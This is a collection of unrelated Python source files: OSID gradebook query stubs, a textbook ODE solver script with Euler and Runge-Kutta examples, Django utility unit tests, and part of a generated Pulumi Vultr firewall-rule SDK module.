"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_ancestor_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_ancestor_gradebook_query()``
is ``false``
*compliance: optional -- This method must be implemented if
``supports_ancestor_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
ancestor_gradebook_query = property(fget=get_ancestor_gradebook_query)
@utilities.arguments_not_none
def match_any_ancestor_gradebook(self, match):
"""Matches gradebook with any ancestor.
arg: match (boolean): ``true`` to match gradebooks with any
ancestor, ``false`` to match root gradebooks
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_ancestor_gradebook_terms(self):
"""Clears the ancestor gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('ancestorGradebook')
ancestor_gradebook_terms = property(fdel=clear_ancestor_gradebook_terms)
@utilities.arguments_not_none
def match_descendant_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query to match gradebooks that have the specified gradebook as a descendant.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_descendant_gradebook_id_terms(self):
"""Clears the descendant gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('descendantGradebookId')
descendant_gradebook_id_terms = property(fdel=clear_descendant_gradebook_id_terms)
def supports_descendant_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_descendant_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented -
``supports_descendant_gradebook_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_descendant_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
descendant_gradebook_query = property(fget=get_descendant_gradebook_query)
@utilities.arguments_not_none
def match_any_descendant_gradebook(self, match):
"""Matches gradebook with any descendant.
arg: match (boolean): ``true`` to match gradebooks with any
descendant, ``false`` to match leaf gradebooks
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_descendant_gradebook_terms(self):
"""Clears the descendant gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('descendantGradebook')
descendant_gradebook_terms = property(fdel=clear_descendant_gradebook_terms)
@utilities.arguments_not_none
def get_gradebook_query_record(self, gradebook_record_type):
"""Gets the gradebook query record corresponding to the given ``Gradebook`` record ``Type``.
Multiple record retrievals produce a nested ``OR`` term.
arg: gradebook_record_type (osid.type.Type): a gradebook
record type
return: (osid.grading.records.GradebookQueryRecord) - the
gradebook query record
raise: NullArgument - ``gradebook_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported - ``has_record_type(gradebook_record_type)``
is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
[per-file quality-signal columns omitted]
hexsha: 80036b67642e60f7dcfa835b8d07fe74b3bf9c4d | size: 5,174 | ext: py | lang: Python | path: chapter_11/chapter11_de.py | repo: p-giakoumoglou/numerical_analysis | repo_head: 1f2e23530972baae00e793b30bb66a5aa75df02b | licenses: ["MIT"] | stars/issues/forks: null
# -*- coding: utf-8 -*-
"""
Author: Paschalis Giakoumoglou
Date: Fri Jun 18 00:42:40 2021
"""
import numpy as np
import math
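# One-step solvers for the IVP x'(t) = f(t, x), stepped on t_n = t0 + n*dt.
# Standard textbook update rules implemented below:
#   Euler (order 1):          x[n+1] = x[n] + dt*f(t[n], x[n])
#   Improved Euler (order 2): x[n+1] = x[n] + (k0 + k1)/2,
#                             k0 = dt*f(t[n], x[n]), k1 = dt*f(t[n+1], x[n] + k0)
#   Midpoint (order 2):       x[n+1] = x[n] + dt*f(t[n] + dt/2, x[n] + k0/2)
#   Classic RK4 (order 4):    x[n+1] = x[n] + (k0 + 2*k1 + 2*k2 + k3)/6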
def euler(f, x0, t0, t1, dt):
print("============================== Euler's Method ============================== ")
print()
t = np.arange(t0, t1 + dt, dt)
x = np.zeros((len(t), len(x0)), np.float64)
x[0, :] = x0
for n in range(len(t) - 1):
x[n + 1, :] = x[n, :] + dt * f(t[n], x[n, :])
print(f"x[{n+1}] = x[{n}] + dt*f(t[{n}], x[{n}]) = {x[n, :]} + {dt}*{f(t[n], x[n, :])} = {x[n, :]} + {dt}*{f(t[n], x[n, :])} = {x[n + 1, :]}")
print()
print('Summing up:')
for n in range(len(t)):
print(f"t[{n}] = {t[n]} -> x[{n}] = {x[n,:]}")
print()
#return t, x
def improved_euler(f, x0, t0, t1, dt):
print("============================== Improved Euler's Method ============================== ")
print()
t = np.arange(t0, t1 + dt, dt)
x = np.zeros((len(t), len(x0)), np.float64)
x[0, :] = x0
for n in range(len(t) - 1):
k0 = dt * f(t[n], x[n])
k1 = dt * f(t[n+1], x[n]+k0)
x[n+1, :] = x[n, :] + 1/2*(k0 + k1)
print(f"k0 = dt * f(t[n], x[n]) = {dt} * {f(t[n], x[n])} = {k0}")
print(f"k1 = dt * f(t[n+1], x[n]+k0) = {dt} * {f(t[n+1], x[n]+k0)} = {k1}")
print(f"x[{n+1}] = x[{n}] + 1/2*(k0+k1) = {x[n, :]} + 1/2*({k0}+{k1}) = {x[n, :] + 1/2*(k0 + k1)}")
print()
print()
print('Summing up:')
for n in range(len(t)):
print(f"t[{n}] = {t[n]} -> x[{n}] = {x[n,:]}")
print()
#return t, x
def mid_point(f, x0, t0, t1, dt):
print("============================== Mid Point Method ==============================")
print()
t = np.arange(t0, t1 + dt, dt)
x = np.zeros((len(t), len(x0)), np.float64)
x[0, :] = x0
for n in range(len(t) - 1):
k0 = dt *f(t[n], x[n, :])
k1 = f(t[n]+1/2*dt, x[n, :]+1/2*k0)
x[n+1, :] = x[n, :] + dt*k1
print(f"k0 = dt *f(t[n], x[n, :]) ={dt}*{f(t[n], x[n])} = {k0}")
print(f"k1 = f(t[n]+1/2*dt, x[n, :]+1/2*k0) = {dt}*f({t[n]+1/2*dt},{x[n]+1/2*k0}) = {dt}*{f(t[n]+1/2*dt, x[n]+1/2*k0)} = {k1}")
print(f"x[{n + 1}] = x[{n}] + {dt}*{k1} = {x[n + 1]} ")
print()
print()
print('Summing up:')
for n in range(len(t)):
print(f"t[{n}] = {t[n]} -> x[{n}] = {x[n,:]}")
print()
#return t, x
def runge_kutta(f, x0, t0, t1, dt):
print("============================== Runge Kutta Method ==============================")
print()
t = np.arange(t0, t1 + dt, dt)
x = np.zeros((len(t), len(x0)), np.float64)
x[0, :] = x0
for n in range(len(t) - 1):
k0 = dt*f(t[n], x[n, :])
k1 = dt*f(t[n]+1/2*dt, x[n, :]+1/2*k0)
k2 = dt*f(t[n]+1/2*dt, x[n, :]+1/2*k1)
k3 = dt*f(t[n+1], x[n, :]+k2)
x[n+1, :] = x[n, :] + 1/6*(k0 + 2*k1 + 2*k2 + k3)
print(f"k0 = {dt}*f({t[n]}, {x[n]}) = {dt}*{f(t[n], x[n])} = {dt*f(t[n], x[n])}")
print(f"k1 = {dt}*f({t[n]+1/2*dt}, {x[n]+1/2*k0}) = {dt}*{f(t[n]+1/2*dt, x[n, :]+1/2*k0)} ={k1}")
print(f"k2 = {dt}*f({t[n]+1/2*dt}, {x[n]+1/2*k1}) = {dt}*{f(t[n]+1/2*dt, x[n, :]+1/2*k1)} ={k2}")
print(f"k3 = {dt}*f({t[n+1]}, {x[n]+k2}) = {dt}*{f(t[n+1], x[n, :]+k2)} ={k3}")
print(f"x[{n + 1}] = x[{n}] + 1/6*(k0 + 2*k1 + 2*k2 + k3) = {x[n, :]} + 1/6*({k0} + 2*{k1} + 2*{k2} + {k3}) = {x[n+1, :]}")
print()
print()
print('Summing up:')
for n in range(len(t)):
print(f"t[{n}] = {t[n]} -> x[{n}] = {x[n,:]}")
print()
#return t, x
def mult_steps(f, x0, t0, t1, dt):
print("============================== Multi Step Method ==============================")
print()
# The original file left this method unimplemented (a bare placeholder).
raise NotImplementedError("multi-step method is not implemented")
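# For reference, a two-step Adams-Bashforth update (standard formula, not
# part of the original file) would be:
#   x[n+1] = x[n] + dt*(3/2*f(t[n], x[n]) - 1/2*f(t[n-1], x[n-1]))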
if __name__ == "__main__":
# Example 1
def f(t, x):
return -x+t+1
x0 = np.array([1])
t0 = 0
t1 = 1
dt = 0.1  # = (t1 - t0)/N
euler(f, x0, t0, t1, dt)
improved_euler(f, x0, t0, t1, dt)
mid_point(f, x0, t0, t1, dt)
runge_kutta(f, x0, t0, t1, dt)
# Example 2: System
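# The right-hand side below has the form of a Lotka-Volterra predator-prey
# model: x0' = 1.1*x0 - 0.4*x0*x1 (prey), x1' = 0.4*x0*x1 - 0.1*x1 (predator).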
def F(t, x):
return np.array([1.1 * x[0] - 0.4 * x[0] * x[1], 0.4 * x[0] * x[1] - 0.1 * x[1]])
x0 = np.array([1,2])
t0 = 0
t1 = 1
dt = 0.1  # = (t1 - t0)/N
euler(F, x0, t0, t1, dt)
improved_euler(F, x0, t0, t1, dt)
mid_point(F, x0, t0, t1, dt)
runge_kutta(F, x0, t0, t1, dt)
#Example 2018
def G(t, x):
return np.array([-3*x[0]+2*x[1], 3*x[0]-4*x[1]])
x0 = np.array([0, 0.5])
t0 = 0
t1 = 0.4
dt = 0.2
runge_kutta(G, x0, t0, t1, dt)
#Example 2019
def f(t, x):
return t**2-math.exp(x)*math.sin(t)
x0 = np.array([1])
t0 = 0
t1 = 0.5
dt = 0.25
runge_kutta(f, x0, t0, t1, dt)
#Example 2019
def f(t, x):
return t**3 - 4*x
x0 = np.array([1])
t0 = 0
t1 = 0.4
dt = 0.2
improved_euler(f, x0, t0, t1, dt)
mid_point(f, x0, t0, t1, dt)
[per-file quality-signal columns omitted]
hexsha: 802b8b3093ce9d8508ae39382fcfaaaaa4dd5f85 | size: 3,574 | ext: py | lang: Python | path: tests/core/test_utils.py | repo: SmallCream/django-cool | repo_head: 63b136da7ce39135c9f900e8161288f8fc8893a4 | licenses: ["BSD-3-Clause"] | stars: 11 (2020-05-19 to 2022-02-25) | forks: 1 (2020-12-24)
# encoding: utf-8
import unittest
from django.contrib.auth import models
from django.test import TestCase
from cool.core import utils
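# Inferred from the assertions below (an inference, not upstream docs):
# split_camel_name() splits a camel-case identifier into its word parts,
# keeping a trailing capital run intact unless fall=True, and
# construct_search() maps an admin-style search prefix ("^", "=", or none)
# to the corresponding ORM lookup suffix (istartswith, iexact, icontains).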
class SplitCamelNameTests(unittest.TestCase):
def test_simple(self):
self.assertListEqual(utils.split_camel_name("GetSimpleView"), ['Get', 'Simple', 'View'])
def test_consecutive_capital_letters_1(self):
self.assertListEqual(utils.split_camel_name("GenerateURL"), ['Generate', 'URL'])
def test_consecutive_capital_letters_2(self):
self.assertListEqual(utils.split_camel_name("GenerateURLs"), ['Generate', 'URLs'])
def test_consecutive_capital_letters_3(self):
self.assertListEqual(utils.split_camel_name("generateURLs"), ['generate', 'URLs'])
def test_consecutive_capital_letters_4(self):
self.assertListEqual(utils.split_camel_name("generateURL"), ['generate', 'URL'])
def test_consecutive_capital_letters_5(self):
self.assertListEqual(utils.split_camel_name("GenerateURLsLite"), ['Generate', 'URLs', 'Lite'])
def test_consecutive_capital_letters_6(self):
self.assertListEqual(utils.split_camel_name("GenerateURLLite"), ['Generate', 'URLLite'])
def test_consecutive_capital_letters_7(self):
self.assertListEqual(utils.split_camel_name("generateURLsLite"), ['generate', 'URLs', 'Lite'])
def test_consecutive_capital_letters_8(self):
self.assertListEqual(utils.split_camel_name("generateURLLite"), ['generate', 'URLLite'])
def test_one_word(self):
self.assertListEqual(utils.split_camel_name("generate"), ['generate'])
def test_one_word_title_case(self):
self.assertListEqual(utils.split_camel_name("Generate"), ['Generate'])
def test_empty_str(self):
self.assertListEqual(utils.split_camel_name(""), [])
def test_consecutive_capital_letters_fall_1(self):
self.assertListEqual(utils.split_camel_name("generateURL", fall=True), ['generate', 'URL'])
def test_consecutive_capital_letters_fall_2(self):
self.assertListEqual(utils.split_camel_name("GenerateURLLite", fall=True), ['Generate', 'URL', 'Lite'])
def test_consecutive_capital_letters_fall_3(self):
self.assertListEqual(utils.split_camel_name("generateURLLite", fall=True), ['generate', 'URL', 'Lite'])
def test_one_word_fall(self):
self.assertListEqual(utils.split_camel_name("generate", fall=True), ['generate'])
def test_one_word_title_case_fall(self):
self.assertListEqual(utils.split_camel_name("Generate", fall=True), ['Generate'])
class ConstructSearchTests(TestCase):
def test_short_istartswith(self):
self.assertEqual(utils.construct_search(models.User.objects, '^username'), "username__istartswith")
def test_short_iexact(self):
self.assertEqual(utils.construct_search(models.User.objects, '=username'), "username__iexact")
def test_short_icontains(self):
self.assertEqual(utils.construct_search(models.User.objects, 'username'), "username__icontains")
def test_icontains(self):
self.assertEqual(utils.construct_search(models.User.objects, 'username__icontains'), "username__icontains")
def test_foreign_key_field(self):
self.assertEqual(utils.construct_search(
models.Permission.objects, 'content_type__app_label'), "content_type__app_label__icontains"
)
def test_foreign_key_pk_field(self):
self.assertEqual(utils.construct_search(
models.Permission.objects, 'content_type__pk'), "content_type__pk__icontains"
)
[per-file quality-signal columns omitted]
hexsha: 8056d63127881edcd10d8f935c8daf372292e399 | size: 21,820 | ext: py | lang: Python | path: sdk/python/pulumi_vultr/firewall_rule.py | repo: vincentbernat/pulumi-vultr | repo_head: 171c75f59d169a62e5486bf9e7f6f421bbe0b7c8 | licenses: ["ECL-2.0", "Apache-2.0"] | stars/issues/forks: null
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['FirewallRuleArgs', 'FirewallRule']
@pulumi.input_type
class FirewallRuleArgs:
def __init__(__self__, *,
firewall_group_id: pulumi.Input[str],
ip_type: pulumi.Input[str],
protocol: pulumi.Input[str],
subnet: pulumi.Input[str],
subnet_size: pulumi.Input[int],
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a FirewallRule resource.
:param pulumi.Input[str] firewall_group_id: The firewall group that the firewall rule will belong to.
:param pulumi.Input[str] ip_type: The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
:param pulumi.Input[str] protocol: The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
:param pulumi.Input[str] subnet: IP address that you want to define for this firewall rule.
:param pulumi.Input[int] subnet_size: The number of bits for the subnet in CIDR notation. Example: 32.
:param pulumi.Input[str] notes: A simple note for a given firewall rule
:param pulumi.Input[str] port: TCP/UDP only. This field can be a specific port or a colon separated port range.
:param pulumi.Input[str] source: Possible values ("", cloudflare)
"""
pulumi.set(__self__, "firewall_group_id", firewall_group_id)
pulumi.set(__self__, "ip_type", ip_type)
pulumi.set(__self__, "protocol", protocol)
pulumi.set(__self__, "subnet", subnet)
pulumi.set(__self__, "subnet_size", subnet_size)
if notes is not None:
pulumi.set(__self__, "notes", notes)
if port is not None:
pulumi.set(__self__, "port", port)
if source is not None:
pulumi.set(__self__, "source", source)
@property
@pulumi.getter(name="firewallGroupId")
def firewall_group_id(self) -> pulumi.Input[str]:
"""
The firewall group that the firewall rule will belong to.
"""
return pulumi.get(self, "firewall_group_id")
@firewall_group_id.setter
def firewall_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "firewall_group_id", value)
@property
@pulumi.getter(name="ipType")
def ip_type(self) -> pulumi.Input[str]:
"""
The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
"""
return pulumi.get(self, "ip_type")
@ip_type.setter
def ip_type(self, value: pulumi.Input[str]):
pulumi.set(self, "ip_type", value)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
"""
The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter
def subnet(self) -> pulumi.Input[str]:
"""
IP address that you want to define for this firewall rule.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter(name="subnetSize")
def subnet_size(self) -> pulumi.Input[int]:
"""
The number of bits for the subnet in CIDR notation. Example: 32.
"""
return pulumi.get(self, "subnet_size")
@subnet_size.setter
def subnet_size(self, value: pulumi.Input[int]):
pulumi.set(self, "subnet_size", value)
@property
@pulumi.getter
def notes(self) -> Optional[pulumi.Input[str]]:
"""
A simple note for a given firewall rule
"""
return pulumi.get(self, "notes")
@notes.setter
def notes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "notes", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[str]]:
"""
TCP/UDP only. This field can be a specific port or a colon separated port range.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
Possible values ("", cloudflare)
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@pulumi.input_type
class _FirewallRuleState:
def __init__(__self__, *,
firewall_group_id: Optional[pulumi.Input[str]] = None,
ip_type: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input[str]] = None,
subnet_size: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering FirewallRule resources.
:param pulumi.Input[str] firewall_group_id: The firewall group that the firewall rule will belong to.
:param pulumi.Input[str] ip_type: The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
:param pulumi.Input[str] notes: A simple note for a given firewall rule
:param pulumi.Input[str] port: TCP/UDP only. This field can be a specific port or a colon separated port range.
:param pulumi.Input[str] protocol: The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
:param pulumi.Input[str] source: Possible values ("", cloudflare)
:param pulumi.Input[str] subnet: IP address that you want to define for this firewall rule.
:param pulumi.Input[int] subnet_size: The number of bits for the subnet in CIDR notation. Example: 32.
"""
if firewall_group_id is not None:
pulumi.set(__self__, "firewall_group_id", firewall_group_id)
if ip_type is not None:
pulumi.set(__self__, "ip_type", ip_type)
if notes is not None:
pulumi.set(__self__, "notes", notes)
if port is not None:
pulumi.set(__self__, "port", port)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if source is not None:
pulumi.set(__self__, "source", source)
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
if subnet_size is not None:
pulumi.set(__self__, "subnet_size", subnet_size)
@property
@pulumi.getter(name="firewallGroupId")
def firewall_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The firewall group that the firewall rule will belong to.
"""
return pulumi.get(self, "firewall_group_id")
@firewall_group_id.setter
def firewall_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "firewall_group_id", value)
@property
@pulumi.getter(name="ipType")
def ip_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
"""
return pulumi.get(self, "ip_type")
@ip_type.setter
def ip_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_type", value)
@property
@pulumi.getter
def notes(self) -> Optional[pulumi.Input[str]]:
"""
A simple note for a given firewall rule
"""
return pulumi.get(self, "notes")
@notes.setter
def notes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "notes", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[str]]:
"""
TCP/UDP only. This field can be a specific port or a colon separated port range.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
Possible values ("", cloudflare)
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input[str]]:
"""
IP address that you want to define for this firewall rule.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter(name="subnetSize")
def subnet_size(self) -> Optional[pulumi.Input[int]]:
"""
The number of bits for the subnet in CIDR notation. Example: 32.
"""
return pulumi.get(self, "subnet_size")
@subnet_size.setter
def subnet_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "subnet_size", value)
class FirewallRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
firewall_group_id: Optional[pulumi.Input[str]] = None,
ip_type: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input[str]] = None,
subnet_size: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Provides a Vultr Firewall Rule resource. This can be used to create, read, modify, and delete Firewall rules.
## Example Usage
Create a Firewall Rule
```python
import pulumi
import pulumi_vultr as vultr
my_firewallgroup = vultr.FirewallGroup("myFirewallgroup", description="base firewall")
my_firewallrule = vultr.FirewallRule("myFirewallrule",
firewall_group_id=my_firewallgroup.id,
protocol="tcp",
ip_type="v4",
subnet="0.0.0.0",
subnet_size=0,
port="8090",
notes="my firewall rule")
```
## Import
Firewall Rules can be imported using the Firewall Group `ID` and Firewall Rule `ID`, e.g.
```sh
$ pulumi import vultr:index/firewallRule:FirewallRule my_rule b6a859c5-b299-49dd-8888-b1abbc517d08,1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] firewall_group_id: The firewall group that the firewall rule will belong to.
:param pulumi.Input[str] ip_type: The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
:param pulumi.Input[str] notes: A simple note for a given firewall rule
:param pulumi.Input[str] port: TCP/UDP only. This field can be a specific port or a colon separated port range.
:param pulumi.Input[str] protocol: The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
:param pulumi.Input[str] source: Possible values ("", cloudflare)
:param pulumi.Input[str] subnet: IP address that you want to define for this firewall rule.
:param pulumi.Input[int] subnet_size: The number of bits for the subnet in CIDR notation. Example: 32.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FirewallRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Vultr Firewall Rule resource. This can be used to create, read, modify, and delete Firewall rules.
## Example Usage
Create a Firewall Rule
```python
import pulumi
import pulumi_vultr as vultr
my_firewallgroup = vultr.FirewallGroup("myFirewallgroup", description="base firewall")
my_firewallrule = vultr.FirewallRule("myFirewallrule",
firewall_group_id=my_firewallgroup.id,
protocol="tcp",
ip_type="v4",
subnet="0.0.0.0",
subnet_size=0,
port="8090",
notes="my firewall rule")
```
## Import
Firewall Rules can be imported using the Firewall Group `ID` and Firewall Rule `ID`, e.g.
```sh
$ pulumi import vultr:index/firewallRule:FirewallRule my_rule b6a859c5-b299-49dd-8888-b1abbc517d08,1
```
:param str resource_name: The name of the resource.
:param FirewallRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FirewallRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
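# Dispatch note: get_resource_args_opts() detects which __init__ overload was
# used -- a single FirewallRuleArgs bundle or loose keyword arguments -- and
# both paths converge on _internal_init below.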
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
firewall_group_id: Optional[pulumi.Input[str]] = None,
ip_type: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input[str]] = None,
subnet_size: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FirewallRuleArgs.__new__(FirewallRuleArgs)
if firewall_group_id is None and not opts.urn:
raise TypeError("Missing required property 'firewall_group_id'")
__props__.__dict__["firewall_group_id"] = firewall_group_id
if ip_type is None and not opts.urn:
raise TypeError("Missing required property 'ip_type'")
__props__.__dict__["ip_type"] = ip_type
__props__.__dict__["notes"] = notes
__props__.__dict__["port"] = port
if protocol is None and not opts.urn:
raise TypeError("Missing required property 'protocol'")
__props__.__dict__["protocol"] = protocol
__props__.__dict__["source"] = source
if subnet is None and not opts.urn:
raise TypeError("Missing required property 'subnet'")
__props__.__dict__["subnet"] = subnet
if subnet_size is None and not opts.urn:
raise TypeError("Missing required property 'subnet_size'")
__props__.__dict__["subnet_size"] = subnet_size
super(FirewallRule, __self__).__init__(
'vultr:index/firewallRule:FirewallRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
firewall_group_id: Optional[pulumi.Input[str]] = None,
ip_type: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input[str]] = None,
subnet_size: Optional[pulumi.Input[int]] = None) -> 'FirewallRule':
"""
Get an existing FirewallRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] firewall_group_id: The firewall group that the firewall rule will belong to.
:param pulumi.Input[str] ip_type: The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
:param pulumi.Input[str] notes: A simple note for a given firewall rule
:param pulumi.Input[str] port: TCP/UDP only. This field can be a specific port or a colon separated port range.
:param pulumi.Input[str] protocol: The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
:param pulumi.Input[str] source: Possible values ("", cloudflare)
:param pulumi.Input[str] subnet: IP address that you want to define for this firewall rule.
:param pulumi.Input[int] subnet_size: The number of bits for the subnet in CIDR notation. Example: 32.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _FirewallRuleState.__new__(_FirewallRuleState)
__props__.__dict__["firewall_group_id"] = firewall_group_id
__props__.__dict__["ip_type"] = ip_type
__props__.__dict__["notes"] = notes
__props__.__dict__["port"] = port
__props__.__dict__["protocol"] = protocol
__props__.__dict__["source"] = source
__props__.__dict__["subnet"] = subnet
__props__.__dict__["subnet_size"] = subnet_size
return FirewallRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="firewallGroupId")
def firewall_group_id(self) -> pulumi.Output[str]:
"""
The firewall group that the firewall rule will belong to.
"""
return pulumi.get(self, "firewall_group_id")
@property
@pulumi.getter(name="ipType")
def ip_type(self) -> pulumi.Output[str]:
"""
The type of ip for this firewall rule. Possible values (v4, v6) **Note** they must be lowercase
"""
return pulumi.get(self, "ip_type")
@property
@pulumi.getter
def notes(self) -> pulumi.Output[Optional[str]]:
"""
A simple note for a given firewall rule
"""
return pulumi.get(self, "notes")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[str]]:
"""
TCP/UDP only. This field can be a specific port or a colon separated port range.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
The type of protocol for this firewall rule. Possible values (icmp, tcp, udp, gre, esp, ah) **Note** they must be lowercase
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter
def source(self) -> pulumi.Output[Optional[str]]:
"""
Possible values ("", cloudflare)
"""
return pulumi.get(self, "source")
@property
@pulumi.getter
def subnet(self) -> pulumi.Output[str]:
"""
IP address that you want to define for this firewall rule.
"""
return pulumi.get(self, "subnet")
@property
